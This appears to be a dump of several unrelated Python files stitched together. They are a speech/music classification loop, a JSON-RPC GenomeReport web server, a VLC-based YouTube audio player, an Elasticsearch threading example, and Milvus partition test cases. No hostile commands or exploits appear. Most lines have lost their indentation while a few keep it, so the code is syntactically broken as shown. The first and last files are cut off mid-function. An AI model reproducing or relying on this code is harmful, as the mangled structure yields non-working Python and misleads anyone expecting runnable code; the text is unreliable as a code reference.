start = time.time()
results = {}
print("Current: ")
# Use features specified in command line arguments
if is_mfcc:
# MFCC classification
startidx = math.floor(len(sig) * i / half_seconds)
endidx = math.ceil(len(sig) * (i + 1) / half_seconds)
current_mfcc = MFCC.read_mfcc(sig[startidx:endidx], rate)
result_mfcc = [-1]
            # Pass the callable and its args separately (the original invoked print_mfcc eagerly)
            thread_mfcc = threading.Thread(
                target=Output.print_mfcc,
                args=(current_mfcc, clf_mfcc, scaler_mfcc, result_mfcc, 9))
if is_cfa:
startidx = math.floor(spectrogram.shape[1] * i / half_seconds)
endidx = math.ceil(spectrogram.shape[1] * (i + 1) / half_seconds)
# CFA classification
cfa, peakis = CFA.calculate_cfa(spec=spectrogram[:, startidx:endidx], threshold=cfa_threshold)
result = round(cfa, 4)
results["cfa"] = result
print("CFA Music: " + str(result))
if is_mfcc:
thread_mfcc.start()
thread_mfcc.join()
results["mfcc"] = result_mfcc
# Make a decision and add to blocks
final_result = decide(results)
# Add to successive blocks
if final_result > 0.5:
succ_music += 1
succ_speech = 0
speech_music_map.append(1)
else:
succ_speech += 1
succ_music = 0
speech_music_map.append(0)
result_str = "SPEECH" if final_result <= 0.5 else "MUSIC"
print("FINAL RESULT: ", final_result, " => " + result_str)
print("Successive music blocks: ", succ_music)
print("Successive speech blocks: ", succ_speech)
i += 1
# Measure execution time
end = time.time()
elapsed = end - start
time_per_iteration += elapsed if i > 1 else 0 # First iteration takes longer as numba caches all the functions
print("Elapsed Time: ", str(elapsed))
print()
# Save CSV and PNG of sequence of classified data (speech_music_map)
    x = np.arange(len(speech_music_map)) / 2  # Convert from samples (one every 0.5 s) to seconds
util.plot_speech_music_map(filename, x, speech_music_map, save_csv=True)
print("Average time per iteration: ", str(time_per_iteration / i))
return x, speech_music_map
def clear_streams():
"""
    Remove all WAV files from the "data/test" folder (previous stream chunks)
:return:
"""
for p in Path("data/test").glob("*.wav"):
p.unlink()
|
GenomeReportServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from GenomeReport.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'GenomeReport'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from GenomeReport.GenomeReportImpl import GenomeReport # noqa @IgnorePep8
impl_GenomeReport = GenomeReport(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
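# A small usage sketch (illustration only): with the encoder above, json.dumps
# can serialise sets, frozensets and any object exposing a toJSONable() method.
#
#   json.dumps({'clouds': {'aws', 'gcp'}}, cls=JSONObjectEncoder)
#   # -> '{"clouds": ["aws", "gcp"]}' (element order is not guaranteed)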
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'GenomeReport'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_GenomeReport.create_genome_report,
name='GenomeReport.create_genome_report',
types=[dict])
self.method_authentication['GenomeReport.create_genome_report'] = 'required' # noqa
self.rpc_service.add(impl_GenomeReport.status,
name='GenomeReport.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'GenomeReport ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
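# A minimal usage sketch (assumption, not part of the original module): run the
# test server in a child process on an OS-assigned port, then shut it down.
def _example_start_and_stop():
    port = start_server(newprocess=True)  # returns the bound port number
    print("test server listening on port %s" % port)
    stop_server()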
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
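# Illustrative only: process_async_cli() expects the input file to contain a
# single JSON-RPC call; "version" and "id" are filled in when missing and an
# optional "context" block is copied into the call context. A minimal payload
# (the params content below is hypothetical) could look like:
#
#   {
#     "method": "GenomeReport.create_genome_report",
#     "params": [{"workspace_name": "my_workspace"}],
#     "version": "1.1",
#     "id": "12345"
#   }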
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
player.py
|
import queue, pafy, youtube_dl, vlc, threading, sys, os
from enum import Enum
JobTypes = {'ADD':0,'PLAY':1,'PAUSE':2,'STOP':3,'EXIT':10}
jobQueue = queue.Queue()
def enqueue_job(job):
jobQueue.put(job)
class Player:
def __init__(self):
self._player = vlc.MediaPlayer()
self._video = None
self._audiostream = None
def setVideo(self, url):
self._video = pafy.new(url)
self._audiostream = self._video.getbestaudio()
self._player.set_mrl(self._audiostream.url)
def play(self):
self._player.play()
def pause(self):
self._player.pause()
def isPlaying(self):
return self._player.is_playing()
def stop(self):
self._player.stop()
class PlayerThread:
def __init__(self):
self.thread = threading.Thread(target=self._run, name='player-thread', daemon=True)
self.thread.start()
def _run(self):
audiostream = Player()
while True:
# block on the queue if it is empty
job = jobQueue.get()
if (job[0] == JobTypes['ADD']):
audiostream.setVideo(job[1])
elif (job[0] == JobTypes['PLAY']):
audiostream.play()
elif (job[0] == JobTypes['PAUSE']):
audiostream.pause()
elif (job[0] == JobTypes['STOP']):
audiostream.stop()
elif (job[0] == JobTypes['EXIT']):
os._exit(1)
jobQueue.task_done()
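# A minimal usage sketch (assumption, not part of the original module): jobs are
# (job_type, payload) tuples pushed onto the shared queue and consumed by the
# player thread; the URL below is only an example.
#
#   PlayerThread()
#   enqueue_job((JobTypes['ADD'], 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'))
#   enqueue_job((JobTypes['PLAY'], None))
#   ...
#   enqueue_job((JobTypes['STOP'], None))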
|
example_multithread.py
|
import argparse
import collections
import time
import threading
from py_elasticinfra.utils.parse_config import ConfigParser
from py_elasticinfra.elk.elastic import Indexer
from py_elasticinfra.runner import Runner
def foreground_thread():
for i in range(5):
time.sleep(3)
print('[INFO] Foreground thread, iteration {}'.format(i+1))
def main(config):
# connect to elasticsearch
es = Indexer(config)
es.connect()
es.create_index()
# initialize threads and run in parallel
runner = Runner(config, es)
runner.run_background()
thread_main = threading.Thread(name="foreground_thread",
target=foreground_thread)
thread_main.start()
time.sleep(5)
runner.stop_background()
if __name__ == "__main__":
args = argparse.ArgumentParser(description="py_elasticinfra")
args.add_argument("-c", "--config", default=None, type=str,
help="config file path (default: None)")
# custom cli options to modify configuration
# from default values given in json file.
custom_args = collections.namedtuple("custom_args", "flags type target")
options = [
custom_args(["--elk", "--elk_host"], type=str,
target=("elk", "host"))
]
config = ConfigParser(parse_args=True, args=args, options=options)
config.init_logger()
main(config)
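# Illustrative only (assumed config layout, not taken from the library): the
# --elk/--elk_host CLI option above overrides config["elk"]["host"], so the JSON
# config file passed via -c is expected to contain at least something like:
#
#   {
#     "elk": {"host": "localhost"}
#   }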
|
test_partition.py
|
import threading
import pytest
from base.partition_wrapper import ApiPartitionWrapper
from base.client_base import TestcaseBase
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "partition_"
class TestPartitionParams(TestcaseBase):
""" Test case of partition interface in parameters"""
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("partition_name, description",
[(cf.gen_unique_str(prefix), cf.gen_unique_str("desc_"))])
def test_partition_default(self, partition_name, description):
"""
target: verify create a partition
method: 1. create a partition
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
# @pytest.mark.xfail(reason="issue #5375")
@pytest.mark.parametrize("partition_name", [""])
def test_partition_empty_name(self, partition_name):
"""
target: verify create a partition with empty name
method: 1. create a partition with an empty name
expected: 1. raise exception
"""
# create a collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition name should not be empty"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, description", [(cf.gen_unique_str(prefix), "")])
def test_partition_empty_description(self, partition_name, description):
"""
target: verify create a partition with empty description
method: 1. create a partition with empty description
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, description",
[(cf.gen_str_by_length(255), cf.gen_str_by_length(2048))])
def test_partition_max_description_length(self, partition_name, description):
"""
target: verify create a partition with a 255-character name and a 2048-character description
method: 1. create a partition with a 255-character name and a 2048-character description
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True}
)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("collection_name, partition_name, description",
[(cf.gen_unique_str(), cf.gen_unique_str(prefix), cf.gen_unique_str())])
def test_partition_dup_name(self, collection_name, partition_name, description):
"""
target: verify create partitions with duplicate name
method: 1. create partitions with duplicate name
expected: 1. create successfully
2. the same partition returned with diff object id
"""
# create a collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_w1 = self.init_partition_wrap(collection_w, partition_name, description)
partition_w2 = self.init_partition_wrap(collection_w, partition_name, description)
# public check func to be extracted
assert id(partition_w1.partition) != id(partition_w2.partition)
assert partition_w1.name == partition_w2.name
assert partition_w1.description == partition_w2.description
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("description", ct.get_invalid_strs)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_special_chars_description(self, partition_name, description):
"""
target: verify create a partition with special characters in description
method: 1. create a partition with special characters in description
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L0)
def test_partition_default_name(self):
"""
target: verify create a partition with default name
method: 1. get the _default partition
2. create a partition with _default name
expected: 1. the same partition returned
"""
# create collection
collection_w = self.init_collection_wrap()
# check that the default partition exists
assert collection_w.has_partition(ct.default_partition_name)[0]
# check that can get the _default partition
collection, _ = collection_w.partition(ct.default_partition_name)
# check that init the _default partition object
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert collection.name == partition_w.name
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_str_by_length(256)])
def test_partition_maxlength_name(self, partition_name):
"""
target: verify create a partition with a 256-character name (exceeding the max length)
method: 1. create a partition with a name longer than the max length
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", ct.get_invalid_strs)
def test_partition_invalid_name(self, partition_name):
"""
target: verify create a partition with invalid name
method: 1. create a partition with invalid names
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
# TODO: need an error code issue #5144 and assert independently
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_none_collection(self, partition_name):
"""
target: verify create a partition with none collection
method: 1. create a partition with none collection
expected: 1. raise exception
"""
# create partition with collection is None
self.partition_wrap.init_partition(collection=None, name=partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "must be pymilvus_orm.Collection"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_drop(self, partition_name):
"""
target: verify drop a partition in one collection
method: 1. create a partition in one collection
2. drop the partition
expected: 1. drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
# check that the partition exists
assert collection_w.has_partition(partition_name)[0]
# drop partition
partition_w.drop()
# check that the partition not exists
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("search_vectors", [cf.gen_vectors(1, ct.default_dim)])
def test_partition_release(self, search_vectors):
"""
target: verify release partition
method: 1. create a collection and several partitions
2. insert data into each partition
3. flush and load the partitions
4. release partition1
5. release partition1 twice
expected: 1. the released partition is released
2. the other partition is not released
"""
# create collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
# insert data to two partition
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
# load two partitions
partition_w1.load()
partition_w2.load()
# search two partitions
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
res2, _ = partition_w2.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res1) == 1 and len(res2) == 1
# release the first partition
partition_w1.release()
# check result
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "partitions have been released"})
res2, _ = partition_w2.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res2) == 1
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
@pytest.mark.parametrize("data, nums", [(cf.gen_default_dataframe_data(10), 10),
(cf.gen_default_list_data(1), 1),
(cf.gen_default_tuple_data(10), 10)])
def test_partition_insert(self, partition_name, data, nums):
"""
target: verify insert multi entities by dataFrame
method: 1. create a collection and a partition
2. partition.insert(data)
3. insert data again
expected: 1. insert data successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name,
"is_empty": True, "num_entities": 0}
)
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name]) # don't need flush for issue #5737
assert not partition_w.is_empty
assert partition_w.num_entities == nums
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert not partition_w.is_empty
assert partition_w.num_entities == (nums + nums)
class TestPartitionOperations(TestcaseBase):
""" Test case of partition interface in operations """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_dropped_collection(self, partition_name):
"""
target: verify create partition against a dropped collection
method: 1. create collection1
2. drop collection1
3. create partition in collection1
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# drop collection
collection_w.drop()
# create partition failed
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_same_name_in_diff_collections(self, partition_name):
"""
target: verify create partitions with same name in diff collections
method: 1. create a partition in collection1
2. create a partition in collection2
expected: 1. create successfully
"""
# create two collections
collection_w1 = self.init_collection_wrap()
collection_w2 = self.init_collection_wrap()
# create 2 partitions in 2 diff collections
self.init_partition_wrap(collection_wrap=collection_w1, name=partition_name)
self.init_partition_wrap(collection_wrap=collection_w2, name=partition_name)
# check result
assert collection_w1.has_partition(partition_name)[0]
assert collection_w2.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_multi_partitions_in_collection(self):
"""
target: verify create multiple partitions in one collection
method: 1. create multiple partitions in one collection
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
for _ in range(10):
partition_name = cf.gen_unique_str(prefix)
# create partition with different names and check the partition exists
self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_maximum_partitions(self):
"""
target: verify create maximum partitions
method: 1. create maximum partitions
2. create one more partition
expected: 1. raise exception
"""
threads_num = 8
threads = []
def create_partition(collection, threads_n):
for _ in range(ct.max_partition_num // threads_n):
name = cf.gen_unique_str(prefix)
par_wrap = ApiPartitionWrapper()
